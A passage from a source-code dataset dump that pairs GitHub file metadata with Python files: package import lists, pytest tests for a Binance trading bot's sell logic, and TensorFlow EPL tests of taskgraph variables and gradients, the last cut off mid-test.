cc8c1f19cc13dd9973c932e4170fac6d59b8d43e | 180 | py | Python | rl/networks/__init__.py | jrobine/smaller-world-models | 2b1a9a0f83668207d8516a95f14131c358a18302 | [
"MIT"
] | null | null | null | rl/networks/__init__.py | jrobine/smaller-world-models | 2b1a9a0f83668207d8516a95f14131c358a18302 | [
"MIT"
] | null | null | null | rl/networks/__init__.py | jrobine/smaller-world-models | 2b1a9a0f83668207d8516a95f14131c358a18302 | [
"MIT"
] | null | null | null |

from .action_value import *
from .actor_critic import *
from .policy_gradient import *
from .separate_actor_critic import *
from .shared_actor_critic import *
from .value import *
| 25.714286 | 36 | 0.8 | 25 | 180 | 5.48 | 0.4 | 0.364964 | 0.372263 | 0.459854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 180 | 6 | 37 | 30 | 0.878205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
aed2227b710980826d19e15a46f486d3b6110eaa | 47 | py | Python | models/__init__.py | williamsashbee/partialconv-gsu | 5ad3b0d0b5a534035a7601e8c66a328457407b13 | [
"BSD-3-Clause"
] | 1,106 | 2018-11-26T20:38:11.000Z | 2022-03-31T19:16:27.000Z | models/__init__.py | Zxl19990529/partialconv | 93cebd9bea58acecf8389ae29d2e53a387b8d69a | [
"BSD-3-Clause"
] | 36 | 2018-11-29T05:41:08.000Z | 2022-03-27T01:53:33.000Z | models/__init__.py | Zxl19990529/partialconv | 93cebd9bea58acecf8389ae29d2e53a387b8d69a | [
"BSD-3-Clause"
] | 231 | 2018-11-29T04:13:13.000Z | 2022-03-31T11:17:32.000Z |

from .pd_resnet import *
from .pd_vgg import *
| 23.5 | 25 | 0.744681 | 8 | 47 | 4.125 | 0.625 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170213 | 47 | 2 | 26 | 23.5 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
aef3a57474cf9d6750c721ac99e3bd340bbe56ef | 5,253 | py | Python | tests/integration/binance/buy/test_sell.py | microweb10/corecito | ac861ac5623c62aa84498c923159e1659149a7ba | [
"Apache-2.0"
] | 6 | 2020-12-23T01:47:46.000Z | 2021-01-21T10:34:08.000Z | tests/integration/binance/buy/test_sell.py | sebaslogen/corecito | d2c47fe8397938df6c8c38c0a1cad11dc3c760a7 | [
"Apache-2.0"
] | 20 | 2020-12-26T14:58:45.000Z | 2021-01-21T19:45:26.000Z | tests/integration/binance/buy/test_sell.py | microweb10/corecito | ac861ac5623c62aa84498c923159e1659149a7ba | [
"Apache-2.0"
] | 2 | 2021-01-08T20:45:23.000Z | 2021-01-17T03:11:07.000Z |

from imports import *
from mocked import Mocked
class TestSell:

    def setup_logger_variable_handler(self):
        logger = logging.getLogger('CN')
        log_capture_string = StringIO()
        log_handler = logging.StreamHandler(log_capture_string)
        logger.addHandler(log_handler)
        return log_capture_string

    def test_core_deviated_sell_excess(self, monkeypatch):
        monkeypatch.setattr(corecito, "get_config", Mocked.config_for_test_core_deviated_sell_excess)
        monkeypatch.setattr(CorecitoAccount, "get_tickers", Mocked.get_tickers_for_test_core_deviated_sell_excess)
        monkeypatch.setattr(CorecitoAccount, "get_balances", Mocked.get_balances_for_test_core_deviated_sell_excess)
        log_capture_string = self.setup_logger_variable_handler()

        asyncio.run(corecito.main())

        log_output = log_capture_string.getvalue()
        log_capture_string.close()
        assert "Working on Binance Exchange" in log_output
        assert "Market BTCEUR" in log_output
        assert "buy price: 11000.0" in log_output
        assert "sell price: 11000.0" in log_output
        assert "(Base) BTC balance:0.1" in log_output
        assert "(Core) EUR balance:0" in log_output
        assert "Core number adjustments" in log_output
        assert "Core number: 1000 EUR" in log_output
        assert "Deviated Core number:1100.000000 EUR" in log_output
        assert "Increased 10.00% - excess of 100.000000 EUR denominated in BTC" in log_output
        assert "Selling: 0.009091 BTC at 11000.0 to park an excess of 100.000000 EUR" in log_output
        assert "Price is rock-solid stable" not in log_output

    def test_price_rock_solid_do_not_sell(self, monkeypatch):
        monkeypatch.setattr(corecito, "get_config", Mocked.config_for_test_price_rock_solid_do_not_sell)
        monkeypatch.setattr(CorecitoAccount, "get_tickers", Mocked.get_tickers_for_test_price_rock_solid_do_not_sell)
        monkeypatch.setattr(CorecitoAccount, "get_balances", Mocked.get_balances_for_test_price_rock_solid_do_not_sell)
        log_capture_string = self.setup_logger_variable_handler()

        asyncio.run(corecito.main())

        log_output = log_capture_string.getvalue()
        log_capture_string.close()
        assert "Working on Binance Exchange" in log_output
        assert "Market BTCEUR" in log_output
        assert "buy price: 10500.0" in log_output
        assert "sell price: 10500.0" in log_output
        assert "(Base) BTC balance:0.1" in log_output
        assert "(Core) EUR balance:0" in log_output
        assert "Core number adjustments" in log_output
        assert "Core number: 1000 EUR" in log_output
        assert "Deviated Core number:1050.000000 EUR" in log_output
        assert "Price is rock-solid stable (5.00%)" in log_output
        assert "Increased 5.00% - excess of 50.000000 EUR denominated in BTC" not in log_output
        assert "Selling:" not in log_output

    def test_exceeded_max_price_do_not_sell(self, monkeypatch):
        monkeypatch.setattr(corecito, "get_config", Mocked.config_for_test_exceeded_max_price_do_not_sell)
        monkeypatch.setattr(CorecitoAccount, "get_tickers", Mocked.get_tickers_for_test_exceeded_max_price_do_not_sell)
        monkeypatch.setattr(CorecitoAccount, "get_balances", Mocked.get_balances_for_test_exceeded_max_price_do_not_sell)
        log_capture_string = self.setup_logger_variable_handler()

        asyncio.run(corecito.main())

        log_output = log_capture_string.getvalue()
        log_capture_string.close()
        assert "Working on Binance Exchange" in log_output
        assert "Market BTCEUR" in log_output
        assert "buy price: 11501.0" in log_output
        assert "sell price: 11501.0" in log_output
        assert "(Base) BTC balance:0.1" in log_output
        assert "(Core) EUR balance:0" in log_output
        assert "Core number adjustments" in log_output
        assert "Core number: 1000 EUR" in log_output
        assert "Deviated Core number:1150.100000 EUR" in log_output
        assert "BTCEUR price exploded to 11501.000000, exceeding the max price to stop corecito 11500.000000" in log_output
        assert "Selling:" not in log_output

    def test_exceeded_max_core_number_increase_percentage_do_not_sell(self, monkeypatch):
        monkeypatch.setattr(corecito, "get_config", Mocked.config_for_test_exceeded_max_core_number_increase_percentage_do_not_sell)
        monkeypatch.setattr(CorecitoAccount, "get_tickers", Mocked.get_tickers_for_test_exceeded_max_core_number_increase_percentage_do_not_sell)
        monkeypatch.setattr(CorecitoAccount, "get_balances", Mocked.get_balances_for_test_exceeded_max_core_number_increase_percentage_do_not_sell)
        log_capture_string = self.setup_logger_variable_handler()

        asyncio.run(corecito.main())

        log_output = log_capture_string.getvalue()
        log_capture_string.close()
        assert "Working on Binance Exchange" in log_output
        assert "Market BTCEUR" in log_output
        assert "buy price: 12001.0" in log_output
        assert "sell price: 12001.0" in log_output
        assert "(Base) BTC balance:0.1" in log_output
        assert "(Core) EUR balance:0" in log_output
        assert "Core number adjustments" in log_output
        assert "Core number: 1000 EUR" in log_output
        assert "Deviated Core number:1200.100000 EUR" in log_output
        assert "Exploded 20.01%" in log_output
        assert "Consider updating CoreNumber to 1200.100000" in log_output
        assert "Selling:" not in log_output
| 44.897436 | 143 | 0.778032 | 771 | 5,253 | 4.98703 | 0.136187 | 0.119376 | 0.13446 | 0.190117 | 0.885826 | 0.844994 | 0.814564 | 0.770091 | 0.76515 | 0.755267 | 0 | 0.045017 | 0.15001 | 5,253 | 116 | 144 | 45.284483 | 0.816125 | 0 | 0 | 0.488636 | 0 | 0 | 0.257757 | 0 | 0 | 0 | 0 | 0 | 0.534091 | 1 | 0.056818 | false | 0 | 0.022727 | 0 | 0.102273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
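A minimal, stdlib-only sketch of the log-capture pattern used by `setup_logger_variable_handler` in the tests above: attach a `logging.StreamHandler` backed by an in-memory `StringIO` buffer, run the code under test, then assert on the captured text. The logger name `"CN"` and the messages mirror the tests; the `logger.info` calls stand in for `asyncio.run(corecito.main())`:

```python
import logging
from io import StringIO

logger = logging.getLogger("CN")
logger.setLevel(logging.INFO)

# Attach an in-memory capture handler.
capture = StringIO()
handler = logging.StreamHandler(capture)
logger.addHandler(handler)

# Stand-in for the code under test emitting log lines.
logger.info("Working on Binance Exchange")
logger.info("Core number: 1000 EUR")

output = capture.getvalue()
logger.removeHandler(handler)  # avoid leaking the handler across tests

assert "Working on Binance Exchange" in output
assert "Selling:" not in output
```

Removing the handler afterwards matters in a real test suite: `logging.getLogger` returns a process-wide singleton, so a leaked handler would see log lines from every later test as well.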
9de99d5192cb06fe6e26baa499373c023bd86daa | 22,882 | py | Python | tests/add_weights_test.py | SeaOfOcean/EasyParallelLibrary | 93baaa851f5ce078b1c55032a27398a588ca4107 | [
"Apache-2.0"
] | 100 | 2022-02-23T08:54:35.000Z | 2022-03-31T04:02:38.000Z | tests/add_weights_test.py | chenyang472043503/EasyParallelLibrary | cd2873fe04c86c62e55418129ba2f1dc83d222b4 | [
"Apache-2.0"
] | null | null | null | tests/add_weights_test.py | chenyang472043503/EasyParallelLibrary | cd2873fe04c86c62e55418129ba2f1dc83d222b4 | [
"Apache-2.0"
] | 22 | 2022-02-23T09:02:01.000Z | 2022-03-18T03:24:00.000Z |

# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Test for add_weight."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from distutils.version import LooseVersion as Version
import six
import numpy as np
import tensorflow as tf
from tensorflow.python.layers import base
from tensorflow.python.platform import test
from tensorflow.python.framework.versions import __version__
import epl
from epl.config import Config
from epl.ir.graph import Graph
new_tf_version = \
    Version(__version__) < Version("2.0") and \
    Version(__version__) >= Version("1.14.0")
# pylint: disable=missing-docstring,protected-access,unused-argument,arguments-differ
# pylint: disable=line-too-long,bad-continuation,unused-variable
class FFN(base.Layer):
  """Construct a FeedForward Networks.

  Args:
    inputs: BLM Tensor.
  Returns:
    outputs: BLM Tensor.
    aux_loss: scalar auxiliary loss.
  """

  def __init__(self, **kwargs):
    super(FFN, self).__init__(**kwargs)
    self.initializer = None
    self.num_experts = 10
    self.intermediate_size = 16
    self.hidden_size = 16
    self.activation_fn = tf.keras.activations.get("relu")

  def build(self, input_shape):
    with epl.split():
      self.in_weights = self.add_weight(shape=(self.num_experts,
                                               self.hidden_size,
                                               self.intermediate_size),
                                        initializer=self.initializer,
                                        dtype=tf.float32,
                                        name='in_weights')
      self.out_weights = self.add_weight(shape=(self.num_experts,
                                                self.intermediate_size,
                                                self.hidden_size),
                                         initializer=self.initializer,
                                         dtype=tf.float32,
                                         name='out_weights')
    super(FFN, self).build(input_shape)

  def call(self, inputs, training=True):
    with epl.split():
      assert training
      intermediate = tf.einsum('EGCM,EMH->EGCH',
                               inputs,
                               self.in_weights,
                               name="inter_outputs")
      # activation function
      activated_inters = self.activation_fn(intermediate)
      # output forward
      outputs = tf.einsum('EGCH,EHM->EGCM',
                          activated_inters,
                          self.out_weights,
                          name="outputs")
      outputs = tf.reshape(outputs, [-1, 640])
    return outputs


class AddWeightTest(test.TestCase):
  """Test import functions of parallelism transformation"""

  def _model_def(self):
    num_x = np.random.randint(0, 10, (500, 2, 20, 16)).astype(dtype=np.float32)
    num_y = np.random.randint(0, 10, 500).astype(dtype=np.int32)
    dataset = tf.data.Dataset.from_tensor_slices((num_x, num_y)) \
        .batch(10).repeat(1)
    iterator = dataset.make_initializable_iterator()
    tf.add_to_collection(tf.GraphKeys.TABLE_INITIALIZERS, iterator.initializer)
    x, _ = iterator.get_next()
    self.ffn = FFN()
    dense1 = self.ffn(inputs=x)
    logits = tf.layers.dense(inputs=dense1, units=10, activation=None)
    return tf.reduce_mean(logits)

  def test_graph_with_local_clip(self):
    conf = epl.Config()
    conf.cluster.colocate_split_and_replicate = True
    epl.init(conf)
    epl.set_default_strategy(epl.replicate(1))
    g = Graph.get()
    loss = self._model_def()
    optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
    tvars = tf.trainable_variables()
    grads = tf.gradients(loss, tvars)
    grads = [tf.clip_by_norm(grad, clip_norm=1.0) for grad in grads]
    optimizer.apply_gradients(list(zip(grads, tvars)))
    tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
        log_device_placement=False))

    # check taskgraph.
    self.assertTrue(len(g.taskgraphs) == 3)
    self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
    self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
    self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)

    vars_list = [[], [], []]
    vars_list[0] = [
        "dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
        "dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
    ]
    # TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
    vars_list[1] = [
        "beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
        "ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
        "ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
        "ffn/out_weights:0"
    ]
    vars_list[2] = []
    grads = [[], [], []]
    grads[0] = [
        "clip_by_norm_2:0",
        "clip_by_norm_3:0"
    ]
    grads[1] = []
    grads[2] = [
        "clip_by_norm:0",
        "clip_by_norm_1:0"
    ]
    for i in range(3):
      taskgraph = g.taskgraphs[i]
      var = [ele.name for ele in taskgraph.get_variables(0)]
      grd = [ele.name for ele in taskgraph.gradients]
      list.sort(var)
      list.sort(grd)
      self.assertEqual(var, vars_list[i])
      self.assertEqual(grd, grads[i])

  def test_graph_with_global_clip(self):
    conf = epl.Config()
    conf.cluster.colocate_split_and_replicate = True
    epl.init(conf)
    epl.set_default_strategy(epl.replicate(1))
    g = Graph.get()
    loss = self._model_def()
    optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
    tvars = tf.trainable_variables()
    grads = tf.gradients(loss, tvars)
    (grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
    optimizer.apply_gradients(list(zip(grads, tvars)))
    tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
        log_device_placement=False))

    # check taskgraph.
    self.assertTrue(len(g.taskgraphs) == 3)
    self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
    self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
    self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)

    vars_list = [[], [], []]
    vars_list[0] = [
        "dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
        "dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
    ]
    # TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
    vars_list[1] = [
        "beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
        "ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"clip_by_global_norm/clip_by_global_norm/_2:0",
"clip_by_global_norm/clip_by_global_norm/_3:0"
]
grads[1] = []
grads[2] = [
"clip_by_global_norm/clip_by_global_norm/_0:0",
"clip_by_global_norm/clip_by_global_norm/_1:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_local_clip_and_amp(self):
config = epl.Config()
config.amp.level = "O1"
config.amp.loss_scale = 128
config.cluster.colocate_split_and_replicate = True
epl.init(config)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
grads = [tf.clip_by_norm(grad, clip_norm=1.0) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"clip_by_norm_2:0",
"clip_by_norm_3:0"
]
grads[1] = []
grads[2] = [
"clip_by_norm:0",
"clip_by_norm_1:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_global_clip_and_amp(self):
config = epl.Config()
config.amp.level = "O1"
config.amp.loss_scale = 128
config.cluster.colocate_split_and_replicate = True
epl.init(config)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
(grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"clip_by_global_norm/clip_by_global_norm/_2:0",
"clip_by_global_norm/clip_by_global_norm/_3:0"
]
grads[1] = []
grads[2] = [
"clip_by_global_norm/clip_by_global_norm/_0:0",
"clip_by_global_norm/clip_by_global_norm/_1:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_local_clip_and_scale(self):
conf = epl.Config()
conf.cluster.colocate_split_and_replicate = True
epl.init(conf)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
grads = [tf.clip_by_norm(grad, clip_norm=1.0) for grad in grads]
# Scale gradients manually
grads = [grad * float(1 / 2) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = ["mul_2:0", "mul_3:0"]
grads[1] = []
grads[2] = ["mul:0", "mul_1:0"]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_local_clip_and_scale_and_amp(self):
config = epl.Config()
config.amp.level = "O1"
config.amp.loss_scale = 128
config.cluster.colocate_split_and_replicate = True
epl.init(config)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
grads = [tf.clip_by_norm(grad, clip_norm=1.0) for grad in grads]
# Scale gradients manually
grads = [grad * float(1 / 2) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = ["mul_3:0", "mul_4:0"] if new_tf_version else ["mul_2:0", "mul_3:0"]
grads[1] = []
grads[2] = ["mul_1:0", "mul_2:0"] if new_tf_version else ["mul:0", "mul_1:0"]
self.assertEqual(len(g.taskgraphs[0].gradients), 2)
self.assertEqual(len(g.taskgraphs[2].gradients), 2)
all_gradients = g.taskgraphs[0].gradients + g.taskgraphs[2].gradients
self.assertEqual(sorted(all_gradients, key=lambda x: x.name), g.gradients)
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
def test_graph_with_global_clip_and_scale(self):
config = epl.Config()
config.cluster.colocate_split_and_replicate = True
epl.init(config)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
(grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
# Scale gradients manually
grads = [grad * float(1 / 2) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = ["mul_2:0", "mul_3:0"]
grads[1] = []
grads[2] = ["mul:0", "mul_1:0"]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_local_clip_after_allreduce(self):
conf = Config()
# Clip gradients after allreduce
conf.communication.clip_after_allreduce = True
conf.cluster.colocate_split_and_replicate = True
epl.init(conf)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
grads = [tf.clip_by_norm(grad, clip_norm=1.0) for grad in grads]
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
# TODO(jiangle.jl): Merge Taskgraph 1 and Taskgraph 2
vars_list[1] = [
"beta1_power:0", "beta2_power:0", "ffn/in_weights/Adam:0",
"ffn/in_weights/Adam_1:0", "ffn/in_weights:0",
"ffn/out_weights/Adam:0", "ffn/out_weights/Adam_1:0",
"ffn/out_weights:0"
]
vars_list[2] = []
grads = [[], [], []]
grads[0] = [
"gradients/dense/BiasAdd_grad/BiasAddGrad:0",
"gradients/dense/MatMul_grad/MatMul_1:0"
]
grads[1] = []
if new_tf_version:
grads[2] = [
"gradients/ffn/inter_outputs/MatMul_grad/Reshape_1:0",
"gradients/ffn/outputs/MatMul_grad/Reshape_1:0"
]
else:
if six.PY2:
grads[2] = [
"gradients/ffn/inter_outputs/MatMul_grad/MatMul_1:0",
"gradients/ffn/outputs/MatMul_grad/MatMul_1:0"
]
else:
grads[2] = [
"gradients/ffn/inter_outputs/transpose_1_grad/transpose:0",
"gradients/ffn/outputs/transpose_1_grad/transpose:0"
]
for i in range(3):
taskgraph = g.taskgraphs[i]
var = [ele.name for ele in taskgraph.get_variables(0)]
grd = [ele.name for ele in taskgraph.gradients]
list.sort(var)
list.sort(grd)
self.assertEqual(var, vars_list[i])
self.assertEqual(grd, grads[i])
def test_graph_with_global_clip_after_allreduce(self):
conf = Config()
# Clip gradients after allreduce
conf.communication.clip_after_allreduce = True
conf.cluster.colocate_split_and_replicate = True
epl.init(conf)
epl.set_default_strategy(epl.replicate(1))
g = Graph.get()
loss = self._model_def()
optimizer = tf.train.AdamOptimizer(learning_rate=0.01)
tvars = tf.trainable_variables()
grads = tf.gradients(loss, tvars)
(grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
optimizer.apply_gradients(list(zip(grads, tvars)))
tf.train.MonitoredTrainingSession(config=tf.ConfigProto(
log_device_placement=False))
# check taskgraph.
self.assertTrue(len(g.taskgraphs) == 3)
self.assertTrue(g.taskgraphs[0].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[1].local_num_replicas == 1)
self.assertTrue(g.taskgraphs[2].local_num_replicas == 1)
vars_list = [[], [], []]
vars_list[0] = [
"dense/bias/Adam:0", "dense/bias/Adam_1:0", "dense/bias:0",
"dense/kernel/Adam:0", "dense/kernel/Adam_1:0", "dense/kernel:0"
]
